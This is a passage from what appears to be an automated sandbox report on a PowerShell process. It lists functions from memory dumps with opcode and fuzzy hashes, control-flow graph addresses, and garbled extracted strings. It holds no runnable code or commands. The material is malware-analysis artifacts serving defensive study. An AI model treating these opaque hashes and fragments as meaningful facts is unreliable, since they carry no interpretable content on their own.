                                                                                                  • Opcode ID: dd1aa7f9a3f0c8fe5ff060fddea75a94145324dfd347b127b56ad2ce9c9a3597
                                                                                                  • Instruction ID: 13fdb702944f473264c04c868c0a237d42261be64ea8a0eb36fee739bf939815
                                                                                                  • Opcode Fuzzy Hash: dd1aa7f9a3f0c8fe5ff060fddea75a94145324dfd347b127b56ad2ce9c9a3597
                                                                                                  • Instruction Fuzzy Hash: CAE16834A00315CFDB55DF64C884AAEBBF6FF98301F10856DE406AB265DB34E946CBA1
                                                                                                  Function 029DDD60 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoSystem
                                                                                                  • String ID:
                                                                                                  • API String ID: 31276548-0
                                                                                                  • Opcode ID: 0f13e925ec3f022d2b853d1de657923265922f31e41c41f33a8da8093ca6b7b2
                                                                                                  • Instruction ID: bf9c7bc028fd876e2c354f523b2b9df0dfc81092ce77cdb1bf536a81dfb032e9
                                                                                                  • Opcode Fuzzy Hash: 0f13e925ec3f022d2b853d1de657923265922f31e41c41f33a8da8093ca6b7b2
                                                                                                  • Instruction Fuzzy Hash: B8111DB1C002499BCB00CF9AD544B9EFBF8FF49224F10812AD818A3200C3B8AA00CFA1
                                                                                                  Function 0834AEE0 Relevance: .8, Instructions: 813COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8c76206374f24b191919068a012aeb987c16b9aeab52574aa91816927fb8ca8
                                                                                                  • Instruction ID: 9437fef52ba47028170e20ac3810497c2449b603e3f455c281c70411764e9152
                                                                                                  • Opcode Fuzzy Hash: d8c76206374f24b191919068a012aeb987c16b9aeab52574aa91816927fb8ca8
                                                                                                  • Instruction Fuzzy Hash: FD82F574A00218DFDB15DF64C984B99BBF2BF88311F1485A9E909AB361CB75ED82CF50
                                                                                                  Function 0833D118 Relevance: .7, Instructions: 679COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 2c0adff11d5f2205494cdd646f49072a549fff86182d1b524f5ed9d369f219d4
                                                                                                  • Instruction ID: d018488af847e338ab117331193d87bda8f9a94ec9cb64c28bb01ce8f5669a10
                                                                                                  • Opcode Fuzzy Hash: 2c0adff11d5f2205494cdd646f49072a549fff86182d1b524f5ed9d369f219d4
                                                                                                  • Instruction Fuzzy Hash: 8D527C34A00219DFDF14DF64C844BAEBBB6BF89300F1481A9E949AB260DB75ED85CF51
                                                                                                  Function 081579F0 Relevance: .7, Instructions: 678COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1febb2e5de49a7206c7f32b05103f5a4b6ca9aea5a9942e31bbe589d2166bed7
                                                                                                  • Instruction ID: 4011bf01c91853c9daa0d4cc2b63938949a1b7ed757080c032405d77412956bd
                                                                                                  • Opcode Fuzzy Hash: 1febb2e5de49a7206c7f32b05103f5a4b6ca9aea5a9942e31bbe589d2166bed7
                                                                                                  • Instruction Fuzzy Hash: FC526F70A00605DFDB19DF64D894A9EBBB2FF88301F148929E8169B3A0DB75ED41CF91
                                                                                                  Function 083334E0 Relevance: .7, Instructions: 664COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b7038076e040a61c7b9b231494bfaa76a80af14892216395dcc98033ce258b92
                                                                                                  • Instruction ID: f842acd6313277585295f0b2fe026355733d14b30dc328289f582b269067047f
                                                                                                  • Opcode Fuzzy Hash: b7038076e040a61c7b9b231494bfaa76a80af14892216395dcc98033ce258b92
                                                                                                  • Instruction Fuzzy Hash: 2C524B34A00225CFDB24EF64D8547ADB7B2FF88311F1485A9D80AAB351DB759E86CF90
                                                                                                  Function 083451B8 Relevance: .7, Instructions: 654COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832818931.0000000008340000.00000040.00000800.00020000.00000000.sdmp, Offset: 08340000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8340000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: cbdd7601b3ba67dcd9325715c4553888a086d66cd48d1c31eaf18e807c62031b
                                                                                                  • Instruction ID: daa70ff6f89bfa69c06a6d087cdd086c2180460b0ad11675c43a188981148688
                                                                                                  • Opcode Fuzzy Hash: cbdd7601b3ba67dcd9325715c4553888a086d66cd48d1c31eaf18e807c62031b
                                                                                                  • Instruction Fuzzy Hash: E4424B74A00205CFDB05DF65D484AAE7BF6BF88321F159569E806AB3A1DB74EC42CF90
                                                                                                  Function 07FBE780 Relevance: .5, Instructions: 461COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 4704b26cd39200b2ada27a2b6580c1855fc46ff4f5059fb19627774f2431e1ee
                                                                                                  • Instruction ID: f02b55d67742a9f48c9f9e925a7296642fcd8108b6b8c08327465f329467e547
                                                                                                  • Opcode Fuzzy Hash: 4704b26cd39200b2ada27a2b6580c1855fc46ff4f5059fb19627774f2431e1ee
                                                                                                  • Instruction Fuzzy Hash: 82024A75B006099FDB14DFA9C894A9EB7B6FF88310F188528E806DB354DB34ED46CB90
                                                                                                  Function 0828BDE8 Relevance: .5, Instructions: 460COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1ff8dfe6e23d65f5df7fe7802151104bd0bf9ab584e5c1cfc8990555d0ab2fc3
                                                                                                  • Instruction ID: e552b5b21880770e6c55ac0089dcdbb750b77bbe28f5911d75ce45fe9943e2ec
                                                                                                  • Opcode Fuzzy Hash: 1ff8dfe6e23d65f5df7fe7802151104bd0bf9ab584e5c1cfc8990555d0ab2fc3
                                                                                                  • Instruction Fuzzy Hash: CD026B70A00209DFDB44EFA8D884BAEB7B2FF88311F148669D5059B391DB74ED45CBA1
                                                                                                  Function 07FB1EC8 Relevance: .3, Instructions: 348COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1823717456.0000000007FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07FB0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7fb0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 83a9f97e963c1a5d8ef829a4bdc73b33345713cc77f896f79b285f5a7073515f
                                                                                                  • Instruction ID: 46507bbdb20880d1fba7b86a1634e3063b97182153a964897b5b25c6c4028a51
                                                                                                  • Opcode Fuzzy Hash: 83a9f97e963c1a5d8ef829a4bdc73b33345713cc77f896f79b285f5a7073515f
                                                                                                  • Instruction Fuzzy Hash: 64D19DB0E00248AFDB18DFA5D851BEEBBB2FF89300F548069E501AB391CB75AD45CB55
                                                                                                  Function 0820FA00 Relevance: 7.6, Strings: 6, Instructions: 105COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 154 820fa00-820fa1a 156 820fa69-820fa77 154->156 157 820fa1c-820fa2a 154->157 162 820fad5-820fae3 156->162 163 820fa79-820fa87 156->163 160 820fa2c-820fa38 157->160 161 820fa3d-820fa44 157->161 170 820fb2a-820fb2e 160->170 164 820fa4a-820fa4c 161->164 171 820fae5-820faf0 162->171 172 820fb1a-820fb22 162->172 173 820fa89-820fa8f 163->173 174 820fa9f-820fab0 163->174 168 820fa64 164->168 169 820fa4e-820fa54 164->169 168->170 175 820fa56 169->175 176 820fa58-820fa5a 169->176 171->172 183 820faf2-820fb00 171->183 172->170 177 820fa91 173->177 178 820fa93-820fa95 173->178 181 820fad1-820fad3 174->181 182 820fab2-820facf 174->182 175->168 176->168 177->174 178->174 181->170 182->181 186 820fb02-820fb08 183->186 187 820fb18 183->187 188 820fb0a 186->188 189 820fb0c-820fb0e 186->189 187->170 188->187 189->187
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ld>t$Ld>t$Ld>t$Ld>t$Ld>t$Ld>t
                                                                                                  • API String ID: 0-64380967
                                                                                                  • Opcode ID: d65d6192dfb27965fc34274d74286c6518f02c038071790b32d14ede0c712f43
                                                                                                  • Instruction ID: 92bd0567c80d33875ad8dcb8ca7f821b62e86fc515d80a61e784f87344b293a3
                                                                                                  • Opcode Fuzzy Hash: d65d6192dfb27965fc34274d74286c6518f02c038071790b32d14ede0c712f43
                                                                                                  • Instruction Fuzzy Hash: CF318734364211DFD7249F2DD654A2637EAEFCC2527298069E806CB3E5DE71DC018F22
                                                                                                  Function 08206F38 Relevance: 6.5, Strings: 5, Instructions: 273COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 191 8206f38-8206fc9 203 8206fd7-8206ff8 191->203 204 8206fcb-8206fce 191->204 207 8207019-8207022 203->207 208 8206ffa-8207012 203->208 204->203 263 8207025 call 8205990 207->263 264 8207025 call 8205971 207->264 208->207 210 820702b-8207073 217 8207079-820707d 210->217 218 820720f-82072c5 210->218 219 820708f-82070ad 217->219 220 820707f-820708d 217->220 252 82072c7-8207303 218->252 224 82070f2-82070fe 219->224 225 82070af-82070c6 219->225 220->219 227 8207104-820720a 220->227 224->218 224->227 232 82070c8 225->232 233 82070cf-82070f0 225->233 227->252 232->233 233->224 263->210 264->210
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$"Et$^Et$^Et$^Et
                                                                                                  • API String ID: 0-783043182
                                                                                                  • Opcode ID: aa4a9074c61b5bfa5b84fb384e21fdf2ac16436e57d92fd10af062d24db4251f
                                                                                                  • Instruction ID: dd3ef4b145652ca4cf4857b496527e6f24d76ba38a4e12704a113770520575d2
                                                                                                  • Opcode Fuzzy Hash: aa4a9074c61b5bfa5b84fb384e21fdf2ac16436e57d92fd10af062d24db4251f
                                                                                                  • Instruction Fuzzy Hash: 95B15D34B006059FEB14DB68D854BAFB7A6FFC8300F148529E50AAB395DF75ED028B91
                                                                                                  Function 0820F6C8 Relevance: 6.4, Strings: 5, Instructions: 188COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 265 820f6c8-820f6d4 266 820f6d6-820f6dc 265->266 267 820f6ec-820f6fc 265->267 268 820f6e0-820f6ea 266->268 269 820f6de 266->269 271 820f720-820f723 267->271 272 820f6fe-820f701 267->272 268->267 269->267 276 820f725-820f728 271->276 277 820f708-820f71d 271->277 274 820f742-820f757 272->274 275 820f703-820f706 272->275 275->277 278 820f75a-820f7d6 275->278 276->278 279 820f72a-820f73f 276->279 315 820f7d8 call 820f9f0 278->315 316 820f7d8 call 820fa00 278->316 290 820f7de-820f7e3 291 820f8f8-820f902 290->291 292 820f7e9-820f807 290->292 294 820f851-820f85a call 8207488 292->294 295 820f809-820f823 292->295 294->291 299 820f860-820f8f5 294->299 300 820f825 295->300 301 820f82c-820f84f 295->301 299->291 300->301 301->294 315->290 316->290
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$09>t$09>t$^Et$9>t
                                                                                                  • API String ID: 0-3237255482
                                                                                                  • Opcode ID: cc177c664fbd47801a5faf7a008d2648c70e529fdc334a229c343a4d766cee32
                                                                                                  • Instruction ID: 542f1aee7bd023fbd2ad3e8328aa609d60a1e1106b18c1676865598e8186d563
                                                                                                  • Opcode Fuzzy Hash: cc177c664fbd47801a5faf7a008d2648c70e529fdc334a229c343a4d766cee32
                                                                                                  • Instruction Fuzzy Hash: B251C574B002169FCB149B6DD8546AEBBE6FFC8311B148469E509DB3D2DF34DD028B92
                                                                                                  Function 08206F29 Relevance: 4.0, Strings: 3, Instructions: 231COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 731 8206f29-8206fc9 744 8206fd7-8206ff8 731->744 745 8206fcb-8206fce 731->745 748 8207019-8207022 744->748 749 8206ffa-8207012 744->749 745->744 804 8207025 call 8205990 748->804 805 8207025 call 8205971 748->805 749->748 751 820702b-8207073 758 8207079-820707d 751->758 759 820720f-82072c5 751->759 760 820708f-82070ad 758->760 761 820707f-820708d 758->761 793 82072c7-8207303 759->793 765 82070f2-82070fe 760->765 766 82070af-82070c6 760->766 761->760 768 8207104-820720a 761->768 765->759 765->768 773 82070c8 766->773 774 82070cf-82070f0 766->774 768->793 773->774 774->765 804->751 805->751
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: "Et$^Et$^Et
                                                                                                  • API String ID: 0-3960570542
                                                                                                  • Opcode ID: 66108d0e14a24506c6293f2754a21174f5cbc028bbce3b5641e30f36118400f2
                                                                                                  • Instruction ID: 46301c7062726663bbab179242491ba442f10dd8a6f65458af4d9dbebf25d798
                                                                                                  • Opcode Fuzzy Hash: 66108d0e14a24506c6293f2754a21174f5cbc028bbce3b5641e30f36118400f2
                                                                                                  • Instruction Fuzzy Hash: 7B915C34B006069FDB15DF68C854BAEB7B6FF88300F148529E409AB395DF75AD068B91
                                                                                                  Function 08280C50 Relevance: 3.1, Strings: 2, Instructions: 580COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 806 8280c50-8280c6d 807 8280c6f-8280c75 806->807 808 8280c85-8280cbc 806->808 809 8280c79-8280c83 807->809 810 8280c77 807->810 814 8280cdb-8280d05 808->814 815 8280cbe-8280cd9 808->815 809->808 810->808 820 8280d0d-8280d1e 814->820 815->820 821 8280d2d-8280d36 820->821 822 8280d20-8280d25 820->822 823 8280d3c-8280d42 821->823 824 8281265-82812be 821->824 822->821 825 8280d50-8280d81 call 8282608 823->825 826 8280d44-8280d4a 823->826 835 82812c0 824->835 836 82812c2 824->836 838 8280d87-8280dff 825->838 828 8280d4c 826->828 829 8280d4e 826->829 828->825 829->825 837 82812c4-82812db 835->837 836->837 841 82812e1-8281317 837->841 842 8281367-828138d 837->842 862 8281108-828110f 838->862 863 8280e05-8280e3b 838->863 852 8281319-828134e 841->852 853 8281356-8281365 841->853 849 8281390-82813c0 842->849 852->853 853->849 865 82811d0-82811ff 862->865 866 8281115-8281181 862->866 875 8280e41-8280e51 863->875 876 8280f85-8280f99 863->876 878 8281207-828122a 865->878 894 8281183-8281185 866->894 895 8281187-828118f 866->895 875->876 882 8280e57-8280e6c 875->882 883 82810fb-8281102 876->883 884 8280f9f-8280fc2 876->884 882->876 890 8280e72-8280e81 882->890 883->862 887 8281248-828125d 883->887 899 8280fc8-8280fcf 884->899 900 828122b-8281240 884->900 887->824 890->876 904 8280e87-8280e8b 890->904 898 8281191-82811ce 894->898 895->898 898->878 902 8280fdb-828100c 899->902 903 8280fd1-8280fd9 899->903 900->887 922 828101b-828101e 902->922 923 828100e-8281019 902->923 903->902 904->876 907 8280e91-8280e9e 904->907 907->876 915 8280ea4-8280ea8 907->915 917 8280eaa-8280eb5 915->917 918 8280eb7-8280eba 915->918 920 8280ec2-8280f84 917->920 918->920 927 8281026-82810f5 922->927 923->927 927->883 927->884
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1829558126.0000000008280000.00000040.00000800.00020000.00000000.sdmp, Offset: 08280000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8280000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Y=t$Y=t
                                                                                                  • API String ID: 0-1495259516
                                                                                                  • Opcode ID: b1416710c0f2ddd3e73ebf457607f59136c19bdc8d51a562dd00defaae42b621
                                                                                                  • Instruction ID: 3bcf50263f66732be0cd499524fba71bde29074d53aa575760b631da04106931
                                                                                                  • Opcode Fuzzy Hash: b1416710c0f2ddd3e73ebf457607f59136c19bdc8d51a562dd00defaae42b621
                                                                                                  • Instruction Fuzzy Hash: 1E421334A01705DFCB19DFA4D488A6EBBB2FF89311B10856DD80A9B395DB31EC86CB51
                                                                                                  Function 0833A3B0 Relevance: 2.8, Strings: 2, Instructions: 280COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 956 833a3b0-833a3c4 958 833a430-833a476 956->958 959 833a3c6-833a3d4 956->959 968 833a543-833a547 958->968 969 833a47c-833a47e 958->969 959->958 962 833a3d6-833a412 959->962 982 833a414-833a421 962->982 983 833a429-833a42d 962->983 971 833a549-833a54b 968->971 972 833a55d 968->972 969->968 973 833a484-833a488 969->973 974 833a555-833a55b 971->974 975 833a54d-833a553 971->975 977 833a563-833a569 972->977 973->968 978 833a48e-833a4a9 973->978 974->977 975->977 986 833a570-833a587 977->986 984 833a4af-833a4b7 978->984 985 833a58e-833a5c7 978->985 982->983 984->986 987 833a4bd-833a4cd 984->987 999 833a5db-833a628 985->999 1000 833a5c9-833a5da 985->1000 986->985 993 833a505-833a540 987->993 994 833a4cf-833a4de 987->994 994->993 1001 833a4e0-833a4fc 994->1001 1039 833a62b call 82008c0 999->1039 1040 833a62b call 82008d0 999->1040 1001->993 1009 833a4fe-833a502 1001->1009 1009->993 1016 833a630-833a640 1018 833a646-833a653 1016->1018 1019 833a6f5-833a6f8 1016->1019 1023 833a655 1018->1023 1024 833a658-833a679 1018->1024 1020 833a6fb-833a728 1019->1020 1023->1024 1029 833a691-833a6f3 1024->1029 1030 833a67b-833a681 1024->1030 1029->1020 1031 833a683 1030->1031 1032 833a685-833a687 1030->1032 1031->1029 1032->1029 1039->1016 1040->1016
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1832009108.0000000008330000.00000040.00000800.00020000.00000000.sdmp, Offset: 08330000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8330000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ^Et$hn
                                                                                                  • API String ID: 0-1465777008
                                                                                                  • Opcode ID: 76188f3927883452953e06f7b11a6530501be66a5a22c56f448269086dbe5199
                                                                                                  • Instruction ID: 09aa24888c21e243ec71e40e9a23f433becb466c7d42717ce46ecbc32119424f
                                                                                                  • Opcode Fuzzy Hash: 76188f3927883452953e06f7b11a6530501be66a5a22c56f448269086dbe5199
                                                                                                  • Instruction Fuzzy Hash: 3EA1BF30B006249FDB14EF68D880AAFBBA6EFC8201B14852DD5469B395DF74DD46CBA1
                                                                                                  Function 08204D40 Relevance: 2.6, Strings: 2, Instructions: 102COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1112 8204d40-8204d51 1113 8204d57-8204d59 1112->1113 1114 8204d71-8204d8c 1113->1114 1115 8204d5b-8204d61 1113->1115 1120 8204de8-8204df6 1114->1120 1121 8204d8e-8204d9d 1114->1121 1116 8204d63 1115->1116 1117 8204d65-8204d67 1115->1117 1116->1114 1117->1114 1124 8204e7c-8204e80 1120->1124 1125 8204dfc-8204e0d 1120->1125 1121->1124 1126 8204da3-8204dbf 1121->1126 1129 8204e0f-8204e2b 1125->1129 1126->1124 1132 8204dc5-8204de5 1126->1132 1135 8204e60-8204e75 1129->1135 1136 8204e2d-8204e2f 1129->1136 1135->1124 1136->1124 1138 8204e31-8204e40 1136->1138 1138->1124 1141 8204e42-8204e5e 1138->1141 1141->1124 1141->1135
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828712003.0000000008200000.00000040.00000800.00020000.00000000.sdmp, Offset: 08200000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8200000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: Ld>t$Ld>t
                                                                                                  • API String ID: 0-1578203329
                                                                                                  • Opcode ID: d1274ca0ffbbec7650ef77fba34dcc15613e7867ff27b0cc5b0683cfacbd70f2
                                                                                                  • Instruction ID: 3b216377db74854ea9be79c92e4171d144a59b462938bef324cc9ea53f161f24
                                                                                                  • Opcode Fuzzy Hash: d1274ca0ffbbec7650ef77fba34dcc15613e7867ff27b0cc5b0683cfacbd70f2
                                                                                                  • Instruction Fuzzy Hash: 3C312334320611DBD304AB7DC954A2A339BEFC8296B69C57CDA05CB796DF31DC028B69
                                                                                                  Function 029DD590 Relevance: 1.7, APIs: 1, Instructions: 223COMMON
                                                                                                  Download Yara Rule

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1608 29dd590-29dd5ee 1612 29dd5f6-29dd616 call 29dc664 1608->1612 1613 29dd5f0-29dd5f3 1608->1613 1616 29dd70c-29dd816 1612->1616 1617 29dd61c-29dd62e call 29dc670 1612->1617 1613->1612 1643 29dd818-29dd824 1616->1643 1644 29dd827-29dd875 IdentifyCodeAuthzLevelW 1616->1644 1619 29dd633-29dd635 1617->1619 1621 29dd637-29dd641 1619->1621 1622 29dd666-29dd66b 1619->1622 1630 29dd64a-29dd664 1621->1630 1631 29dd643-29dd648 1621->1631 1623 29dd66d-29dd687 1622->1623 1624 29dd689-29dd6ab call 29dd18c 1622->1624 1627 29dd6db-29dd6e3 call 29dd198 1623->1627 1624->1627 1627->1616 1630->1627 1631->1630 1634 29dd6ad-29dd6d4 1631->1634 1634->1627 1643->1644 1646 29dd87e-29dd8c7 1644->1646 1647 29dd877-29dd87d 1644->1647 1651 29dd8d9-29dd8e0 1646->1651 1652 29dd8c9-29dd8cf 1646->1652 1647->1646 1653 29dd8f7 1651->1653 1654 29dd8e2-29dd8f1 1651->1654 1652->1651 1656 29dd8f8 1653->1656 1654->1653 1656->1656
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c93074c59652f366fdef84d1beeff575a7bdac4fb3585dedba53dd50e5e34cd
                                                                                                  • Instruction ID: 5ecb6dd35dcc3c284bf69496eaca894c1ce182d246146ccc8dde5edd7ad9f0c2
                                                                                                  • Opcode Fuzzy Hash: 3c93074c59652f366fdef84d1beeff575a7bdac4fb3585dedba53dd50e5e34cd
                                                                                                  • Instruction Fuzzy Hash: 1E915E71D00359DFEB25CFA5C944B9DBBF5BF44304F1084AAD409AB290DBB59A85CFA0
                                                                                                  Function 029DD744 Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 029DD862
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                  • String ID:
                                                                                                  • API String ID: 1431151113-0
                                                                                                  • Opcode ID: 1e7d25e14ff49553f9a14148a8b9742bff4657245384b7ed9f75242e32a8f82a
                                                                                                  • Instruction ID: 1c8134d56dd4872805e506575e81aa93e9b601b3f3ce50946e0f873191dde260
                                                                                                  • Opcode Fuzzy Hash: 1e7d25e14ff49553f9a14148a8b9742bff4657245384b7ed9f75242e32a8f82a
                                                                                                  • Instruction Fuzzy Hash: 5A41F471D4126ACFEB25CF99C984BDEBBB4AB08304F10C5EAD40DA7250D7759A89CF60
                                                                                                  Function 029DD750 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • IdentifyCodeAuthzLevelW.ADVAPI32(?,?,?,00000000), ref: 029DD862
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1811965993.00000000029D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029D0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_29d0000_powershell.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AuthzCodeIdentifyLevel
                                                                                                  • String ID:
                                                                                                  • API String ID: 1431151113-0
                                                                                                  • Opcode ID: 891bc289e62e934371dfee57810668673e5781619048b0c87cee4f6fe5ce5a26
                                                                                                  • Instruction ID: d92a9abe460965d270b27e0752090c8e75564e1a8f01816f95162b58c978b9e9
                                                                                                  • Opcode Fuzzy Hash: 891bc289e62e934371dfee57810668673e5781619048b0c87cee4f6fe5ce5a26
                                                                                                  • Instruction Fuzzy Hash: C741E4B1D4126ACFEB25CF99C984BDDBBB4AB08304F10C5EAD40DA7250D7759A89CF60
                                                                                                  Function 08159B88 Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1828046144.0000000008150000.00000040.00000800.00020000.00000000.sdmp, Offset: 08150000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_8150000_powershell.jbxd
